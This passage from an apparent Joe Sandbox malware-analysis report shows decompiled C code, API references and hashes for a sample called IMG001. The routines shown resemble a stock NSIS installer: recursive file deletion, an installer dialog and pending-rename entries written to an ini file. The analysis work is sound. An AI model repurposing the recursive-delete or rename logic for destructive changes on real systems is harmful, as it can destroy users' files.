							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x7b84b8 - 0x5c;
					if( *0x7b84b8 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405CEB(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E004054E3(_t72);
							E004056A8(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404D8E(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404D8E(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E0040573E();
						}
						L33:
						 *0x7c5728 =  *0x7c5728 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

0x00405320
0x00405324
0x0040532d
0x00405330
0x00405333
0x0040533b
0x0040533d
0x0040533e
0x00000000
0x0040533e
0x0040534d
0x0040534d
0x00405350
0x00405353
0x00405367
0x0040536e
0x00405373
0x00405375
0x00405385
0x00405377
0x0040537d
0x0040537d
0x0040538a
0x0040538d
0x00405398
0x0040539e
0x004053a3
0x004053b3
0x004053b5
0x004053bb
0x004053be
0x004053c1
0x0040547e
0x0040547e
0x00405482
0x00405484
0x00405484
0x00405484
0x00405484
0x00000000
0x00000000
0x00000000
0x00000000
0x004053c7
0x004053c7
0x004053d0
0x004053d6
0x004053db
0x004053de
0x004053e0
0x004053e4
0x004053e6
0x004053e6
0x004053e4
0x004053e9
0x004053ec
0x004053ff
0x00405401
0x00405406
0x0040540d
0x00405425
0x0040542b
0x00405431
0x00405433
0x00405458
0x00405435
0x00405435
0x00405439
0x0040544d
0x0040543b
0x0040543e
0x00405443
0x00405445
0x00405446
0x00405446
0x00405439
0x0040540f
0x00405415
0x00405417
0x0040541d
0x0040541d
0x00405417
0x00000000
0x0040540d
0x004053ee
0x004053f1
0x004053f3
0x00000000
0x00000000
0x004053f5
0x004053f7
0x00000000
0x00000000
0x004053f9
0x004053fd
0x00000000
0x00000000
0x00000000
0x0040545d
0x00405467
0x0040546d
0x0040546d
0x00405478
0x00000000
0x00405478
0x0040538f
0x00405396
0x00000000
0x00000000
0x00000000
0x00405355
0x00405355
0x00405357
0x00405488
0x0040548b
0x0040548e
0x004054e0
0x004054e0
0x004054e0
0x00405490
0x00405493
0x0040549e
0x004054a3
0x004054a5
0x00000000
0x00000000
0x004054a8
0x004054ae
0x004054b4
0x004054ba
0x004054bc
0x00000000
0x004054d8
0x004054be
0x004054c2
0x00000000
0x00000000
0x004054c7
0x004054cc
0x004054cd
0x00000000
0x004054ce
0x00405495
0x00405495
0x00000000
0x00405495
0x0040535d
0x00405361
0x00000000
0x00000000
0x00000000
0x00405361

APIs

DeleteFileA.KERNEL32(?,?,007EE000,00000000), ref: 00405333
lstrcatA.KERNEL32(007B84B8,\*.*,007B84B8,?,00000000,?,007EE000,00000000), ref: 0040537D
lstrcatA.KERNEL32(?,00409010,?,007B84B8,?,00000000,?,007EE000,00000000), ref: 0040539E
lstrlenA.KERNEL32(?,?,00409010,?,007B84B8,?,00000000,?,007EE000,00000000), ref: 004053A4
FindFirstFileA.KERNEL32(007B84B8,?,?,?,00409010,?,007B84B8,?,00000000,?,007EE000,00000000), ref: 004053B5
FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 00405467
FindClose.KERNEL32(?), ref: 00405478

Strings

\*.*, xrefs: 00405377

Memory Dump Source

Source File: 00000000.00000002.216570589.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.216563304.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216576027.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216579612.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216582967.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216663345.0000000000783000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216668718.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216683010.000000000078D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216699546.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216713433.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216719012.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216736757.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMG001.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 2035342205-1173974218
Opcode ID: 24ada9ff7337345965a0f49e05d7d16f5ef344ee665e6ab09e187fbc7306ff31
Instruction ID: a3bd02508b0b95f8a0c7cde32addaa27e2f8db40fee80c7c76cb9bfc506cccd8
Opcode Fuzzy Hash: 24ada9ff7337345965a0f49e05d7d16f5ef344ee665e6ab09e187fbc7306ff31
Instruction Fuzzy Hash: F351B030904A44AACB216B219C45BFF3B68DF42765F14817FFD01751D2D77C49819F6A

Uniqueness

Uniqueness Score: -1.00%

Function 004038CF, Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E004038CF(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x7b0494 = _t35;
					if(_t115 == 0x110) {
						 *0x7c56a8 = _t125;
						 *0x7b04a8 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x7a8470 = _t91;
						E00403DA2(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x7c1688);
						 *0x7c166c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x7b0494 = 1;
					}
					_t122 =  *0x4091a4; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x7c56c0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403DEE(0x40b);
						while(1) {
							_t37 =  *0x7b0494;
							 *0x4091a4 =  *0x4091a4 + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091a4; // 0xffffffff
							__eflags = _t39 -  *0x7c56c4;
							if(_t39 ==  *0x7c56c4) {
								E0040140B(1);
							}
							__eflags =  *0x7c166c - _t133;
							if( *0x7c166c != _t133) {
								break;
							}
							__eflags =  *0x4091a4 -  *0x7c56c4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405A12(_t116, _t125, _t130, 0x802000,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403DA2(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403DA2(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403DA2(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x7c572c - _t133;
							_v32 = _t49;
							if( *0x7c572c != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403DC4(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x7a8470, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x7c572c - _t133;
							if( *0x7c572c == _t133) {
								_push( *0x7b04a8);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x7a8470);
							}
							E00403DD7();
							E004059F0(0x7b04b0, 0x7c16a0);
							E00405A12(0x7b04b0, _t125, _t130,  &(0x7b04b0[lstrlenA(0x7b04b0)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x7b04b0);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x7c1678);
									 *0x7ac480 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x7c56a0,  *_t130 +  *0x7c1680 & 0x0000ffff, _t125,  *(0x4091a8 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x7c1678 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403DA2(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x7c1678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x7c166c - _t133;
									if( *0x7c166c != _t133) {
										goto L61;
									}
									ShowWindow( *0x7c1678, 8);
									E00403DEE(0x405);
									goto L58;
								}
								__eflags =  *0x7c572c - _t133;
								if( *0x7c572c != _t133) {
									goto L61;
								}
								__eflags =  *0x7c5720 - _t133;
								if( *0x7c5720 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x7c1678);
						 *0x7c56a8 = _t133;
						EndDialog(_t125,  *0x7aa478);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x7c1678, 0x40f, 0, 1);
						__eflags =  *0x7c166c;
						return 0 |  *0x7c166c == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x7b0488, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x7b0488,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return L00403E09(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x7c1678, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x7c572c - _t133;
										if( *0x7c572c == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x7aa478 = 1;
											L21:
											_push(0x78);
											L22:
											E00403D7B();
											goto L26;
										}
										E0040140B(_t127);
										 *0x7aa478 = _t127;
										goto L21;
									}
									__eflags =  *0x4091a4 - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x7c1678);
						 *0x7c1678 = _a12;
						L58:
						if( *0x7b84b0 == _t133 &&  *0x7c1678 != _t133) {
							ShowWindow(_t125, 0xa);
							 *0x7b84b0 = 1;
						}
						L61:
						return 0;
					}
				}
			}

0x004038d8
0x004038e1
0x00403a22
0x00403a26
0x00403a2a
0x00403a2c
0x00403a31
0x00403a3c
0x00403a47
0x00403a4c
0x00403a4e
0x00403a50
0x00403a53
0x00403a58
0x00403a66
0x00403a73
0x00403a7a
0x00403a7a
0x00403a7b
0x00403a7b
0x00403a80
0x00403a86
0x00403a8d
0x00403a93
0x00403a95
0x00403ad5
0x00403ada
0x00403adf
0x00403adf
0x00403ae4
0x00403aed
0x00403aef
0x00403af4
0x00403afa
0x00403afe
0x00403afe
0x00403b03
0x00403b09
0x00000000
0x00000000
0x00403b14
0x00403b1a
0x00000000
0x00000000
0x00403b23
0x00403b2b
0x00403b30
0x00403b33
0x00403b39
0x00403b3e
0x00403b41
0x00403b47
0x00403b4c
0x00403b4f
0x00403b55
0x00403b5d
0x00403b63
0x00403b69
0x00403b6d
0x00403b74
0x00403b74
0x00403b74
0x00403b7e
0x00403b90
0x00403b9c
0x00403ba1
0x00403bab
0x00403bb1
0x00403bb3
0x00403bb8
0x00403bb5
0x00403bb5
0x00403bb5
0x00403bc8
0x00403be0
0x00403be2
0x00403be8
0x00403bfd
0x00403bea
0x00403bf3
0x00403bf5
0x00403bf5
0x00403c03
0x00403c13
0x00403c24
0x00403c2b
0x00403c31
0x00403c35
0x00403c3a
0x00403c3c
0x00000000
0x00403c42
0x00403c42
0x00403c44
0x00000000
0x00000000
0x00403c4a
0x00403c4e
0x00403c73
0x00403c79
0x00403c7f
0x00403c81
0x00000000
0x00000000
0x00403ca7
0x00403cad
0x00403caf
0x00403cb4
0x00000000
0x00000000
0x00403cba
0x00403cbd
0x00403cc0
0x00403cd7
0x00403ce3
0x00403cfc
0x00403d02
0x00403d06
0x00403d0b
0x00403d11
0x00000000
0x00000000
0x00403d1b
0x00403d26
0x00000000
0x00403d26
0x00403c50
0x00403c56
0x00000000
0x00000000
0x00403c5c
0x00403c62
0x00000000
0x00000000
0x00000000
0x00403c68
0x00403c3c
0x00403d33
0x00403d3f
0x00403d46
0x00000000
0x00403a97
0x00403a97
0x00403a9a
0x00403acd
0x00403acd
0x00403acf
0x00000000
0x00000000
0x00000000
0x00403acf
0x00403a9c
0x00403aa0
0x00403aa5
0x00403aa7
0x00000000
0x00000000
0x00403ab7
0x00403abf
0x00000000
0x00403ac5
0x004038f3
0x004038f3
0x004038f7
0x004038fc
0x0040390b
0x0040390b
0x00403914
0x0040391d
0x00403928
0x00403928
0x00403934
0x00403950
0x00403953
0x00403966
0x0040396c
0x00403a0f
0x00000000
0x00403a18
0x00403972
0x0040397f
0x00403981
0x00403983
0x004039a2
0x004039a2
0x004039a5
0x004039aa
0x004039ad
0x004039bd
0x004039be
0x004039c0
0x004039f6
0x00403a09
0x00000000
0x00403a09
0x004039c2
0x004039c8
0x004039e1
0x004039e6
0x004039e8
0x00000000
0x00000000
0x004039ea
0x004039d6
0x004039d6
0x004039d8
0x004039d8
0x00000000
0x004039d8
0x004039cb
0x004039d0
0x00000000
0x004039d0
0x004039af
0x004039b5
0x00000000
0x00000000
0x004039b7
0x00000000
0x004039b7
0x004039a7
0x00000000
0x004039a7
0x0040398d
0x00403994
0x0040399a
0x0040399c
0x00000000
0x00000000
0x00000000
0x0040399c
0x00403958
0x00000000
0x00403936
0x0040393c
0x00403946
0x00403d4c
0x00403d52
0x00403d5f
0x00403d65
0x00403d65
0x00403d6f
0x00000000
0x00403d6f
0x00403934

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 0040390B
ShowWindow.USER32(?), ref: 00403928
DestroyWindow.USER32 ref: 0040393C
SetWindowLongA.USER32 ref: 00403958
GetDlgItem.USER32 ref: 00403979
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 0040398D
IsWindowEnabled.USER32(00000000), ref: 00403994
GetDlgItem.USER32 ref: 00403A42
GetDlgItem.USER32 ref: 00403A4C
SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403A66
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403AB7
GetDlgItem.USER32 ref: 00403B5D
ShowWindow.USER32(00000000,?), ref: 00403B7E
EnableWindow.USER32(?,?), ref: 00403B90
EnableWindow.USER32(?,?), ref: 00403BAB
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403BC1
EnableMenuItem.USER32 ref: 00403BC8
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403BE0
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403BF3
lstrlenA.KERNEL32(007B04B0,?,007B04B0,007C16A0), ref: 00403C1C
SetWindowTextA.USER32(?,007B04B0), ref: 00403C2B
ShowWindow.USER32(?,0000000A), ref: 00403D5F

Memory Dump Source

Source File: 00000000.00000002.216570589.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.216563304.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216576027.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216579612.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216582967.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216663345.0000000000783000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216668718.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216683010.000000000078D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216699546.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216713433.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216719012.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216736757.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMG001.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 4a61885d911feefb6f79ed82dae61af64a62622e157ad16d97c371e073bd281d
Instruction ID: 844fe8c9d5e64a327b0a20496c5cf27aed03d28131746735177e2461b2ae32ce
Opcode Fuzzy Hash: 4a61885d911feefb6f79ed82dae61af64a62622e157ad16d97c371e073bd281d
Instruction Fuzzy Hash: 93C19C71A04204AFDB206F21ED85E2B3F6CEB45706F44453EF641B52E1CB7DA9819B2E

Uniqueness

Uniqueness Score: -1.00%

Function 0040573E, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040573E() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405D12(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x7c5730 =  *0x7c5730 + 1;
						return _t20;
					}
				}
				 *0x7bce40 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x7bc8b8, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x7bc4b8, "%s=%s\r\n", 0x7bce40, 0x7bc8b8);
						_t56 = _t55 + 0x10;
						E00405A12(_t43, 0x400, 0x7bc8b8, 0x7bc8b8,  *((intOrPtr*)( *0x7c56b0 + 0x128)));
						_t20 = E004056C7(0x7bc8b8, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E0040563C(_t51, "[Rename]\r\n") != 0) {
								_t28 = E0040563C(_t26 + 0xa, 0x409330);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E00405688(_t51 + _t29, 0x7bc4b8, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E004059F0(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E004056C7(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x7bce40, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}

0x00405744
0x0040574b
0x0040574f
0x00405758
0x0040575c
0x0040589b
0x0040589b
0x00000000
0x0040589b
0x0040575c
0x00405768
0x0040577e
0x004057a6
0x004057b1
0x004057b5
0x004057d5
0x004057dc
0x004057e6
0x004057f3
0x004057f8
0x004057fd
0x00405801
0x00000000
0x00000000
0x00405810
0x00405812
0x0040581f
0x00405823
0x00405894
0x00405895
0x00000000
0x0040583f
0x0040584c
0x004058b1
0x004058b8
0x0040585f
0x0040585f
0x00405861
0x0040586a
0x00405875
0x00405887
0x0040588e
0x00000000
0x0040588e
0x004058ba
0x004058bb
0x004058c0
0x004058c2
0x004058cf
0x004058cf
0x004058d3
0x00000000
0x00000000
0x00000000
0x00000000
0x004058c4
0x004058c4
0x004058c7
0x004058ca
0x004058cb
0x00000000
0x004058c4
0x00405857
0x0040585c
0x00000000
0x0040585c
0x00405823
0x00405780
0x0040578b
0x00405794
0x00405798
0x00000000
0x00000000
0x00405798
0x004058a5

APIs

Part of subcall function 00405D12: GetModuleHandleA.KERNEL32(?,?,00000000,00403121,00000008), ref: 00405D24
Part of subcall function 00405D12: LoadLibraryA.KERNELBASE(?,?,00000000,00403121,00000008), ref: 00405D2F
Part of subcall function 00405D12: GetProcAddress.KERNEL32(00000000,?), ref: 00405D40

CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,004054D3,?,00000000,000000F1,?), ref: 0040578B
GetShortPathNameA.KERNEL32 ref: 00405794
GetShortPathNameA.KERNEL32 ref: 004057B1
wsprintfA.USER32 ref: 004057CF
GetFileSize.KERNEL32(00000000,00000000,007BC8B8,C0000000,00000004,007BC8B8,?,?,?,00000000,000000F1,?), ref: 0040580A
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405819
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040582F
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,007BC4B8,00000000,-0000000A,00409330,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405875
WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405887
GlobalFree.KERNEL32 ref: 0040588E
CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405895

Part of subcall function 0040563C: lstrlenA.KERNEL32(00000000,?,00000000,00000000,0040584A,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405643
Part of subcall function 0040563C: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,0040584A,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405673

Strings

[Rename], xrefs: 0040583F, 00405851
%s=%s, xrefs: 004057C5

Memory Dump Source

Source File: 00000000.00000002.216570589.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.216563304.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216576027.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216579612.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216582967.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216663345.0000000000783000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216668718.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216683010.000000000078D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216699546.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216713433.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216719012.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216736757.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMG001.jbxd

Similarity

API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
String ID: %s=%s$[Rename]
API String ID: 3772915668-1727408572
Opcode ID: 11cba2204838a82524e086cb36a27bb1f651aff521618a1f3f6d53a001441ec3
Instruction ID: 68e1e79a5e3aa16c535a31722805a41b57947565a1a8d7e540e025e6bd358360
Opcode Fuzzy Hash: 11cba2204838a82524e086cb36a27bb1f651aff521618a1f3f6d53a001441ec3
Instruction Fuzzy Hash: FA41E072604B11ABE7217B619C49FAB3A5CEF45714F04843AFD05F62D2E63DA8018EBD

Uniqueness

Uniqueness Score: -1.00%

Function 00404D8E, Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404D8E(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x7c1684;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x7c5754;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405A12(0, _t39, 0x7ac488, 0x7ac488, _a4);
					}
					_t26 = lstrlenA(0x7ac488);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x7c1668, 0x7ac488);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x7ac488;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x7ac488)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x4000) {
							_t26 = lstrcatA(0x7ac488, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

0x00404d94
0x00404da0
0x00404da3
0x00404da9
0x00404db5
0x00404db8
0x00404dbb
0x00404dc1
0x00404dc1
0x00404dc7
0x00404dcf
0x00404dd2
0x00404def
0x00404df3
0x00404dfc
0x00404dfc
0x00404e06
0x00404e0f
0x00404e1b
0x00404e22
0x00404e26
0x00404e29
0x00404e3c
0x00404e4a
0x00404e4a
0x00404e4e
0x00404e50
0x00404e53
0x00000000
0x00404e53
0x00404dd4
0x00404ddc
0x00404de4
0x00404dea
0x00000000
0x00404dea
0x00404de4
0x00404dd2
0x00404e5d

APIs

lstrlenA.KERNEL32(007AC488,00000000,0079D058,00792458,?,?,?,?,?,?,?,?,?,00402F95,00000000,?), ref: 00404DC7
lstrlenA.KERNEL32(00402F95,007AC488,00000000,0079D058,00792458,?,?,?,?,?,?,?,?,?,00402F95,00000000), ref: 00404DD7
lstrcatA.KERNEL32(007AC488,00402F95,00402F95,007AC488,00000000,0079D058,00792458), ref: 00404DEA
SetWindowTextA.USER32(007AC488,007AC488), ref: 00404DFC
